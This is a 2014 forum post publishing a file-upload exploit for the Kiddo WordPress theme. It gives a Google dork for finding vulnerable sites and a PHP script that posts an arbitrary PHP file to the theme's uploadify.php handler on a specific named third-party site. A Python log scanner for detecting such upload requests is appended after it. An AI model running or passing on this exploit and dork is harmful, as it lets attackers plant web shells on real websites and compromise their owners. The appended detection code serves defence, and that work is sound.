W-P Admin
Posts : 80 Join date : 2013-11-12 Age : 38 Location : Cyber World
Subject: Kidoo WP Theme File Upload Vulnerability
Wed Apr 16, 2014 9:15 am
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Kidoo WP Theme File Upload Vulnerability
[+] Date: 05-02-2014
[+] Category: WebApp
[+] Google Dork:
Code:
intext:"Powered by WordPress. Kiddo design by Antoni Botev & Evgeni Dimov"
[+] Tested on: KaliLinux
[+] Vendor: n/a
[+] Friendly Sites: na3il.com,th3-creative.com

Requirements:
1.) AppServ (download it)
2.) 3xp.php exploit (copy the code below and save it as 3xp.php)
Code:
<?php
echo "=============================================== \n";
echo " Kiddo WP Theme File Upload Vulnerability\n";
echo " TUNISIAN CYBER \n";
echo "=============================================== \n\n";
$uploadfile="jp.php";
$ch = curl_init("http://brightstartlearningcenter.com/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
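A defender-side check for the request this post describes, added here as an example and not part of the original post: it scans web-server access logs for requests that reach an `uploadify.php` inside a theme directory. It assumes Combined Log Format; the function name, verdict labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Any uploadify.php shipped inside a theme directory, at any depth.
ENDPOINT_RE = re.compile(
    r'^/wp-content/themes/(?P<theme>[^/]+)/(?:[^/]+/)*uploadify\.php$', re.I
)

def find_uploadify_hits(lines):
    """Return one finding per request that reaches a theme's uploadify.php."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format line
        # Drop the query string, decode %xx escapes, collapse repeated slashes.
        path = unquote(m["target"].split("?", 1)[0])
        path = re.sub(r"/{2,}", "/", path)
        ep = ENDPOINT_RE.match(path)
        if not ep:
            continue
        status = int(m["status"])
        if m["method"] == "POST" and 200 <= status < 300:
            # Handler answered a POST with 2xx: review the site for new files.
            verdict = "upload-accepted"
        elif m["method"] == "POST":
            verdict = "upload-attempt"
        else:
            verdict = "probe"
        findings.append({"ip": m["ip"], "time": m["time"],
                         "theme": ep["theme"].lower(), "verdict": verdict})
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [16/Apr/2014:09:20:01 +0000] "POST /wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.4 - - [16/Apr/2014:09:21:10 +0000] "GET /wp-content/themes/Kiddo/app/assets/js/uploadify/uploadify%2Ephp?x=1 HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.9 - - [16/Apr/2014:09:22:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"',
    '203.0.113.7 - - [16/Apr/2014:09:23:45 +0000] "POST /wp-content/themes/other/uploadify/uploadify.php HTTP/1.1" 403 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_uploadify_hits(SAMPLE):
        print(hit)
```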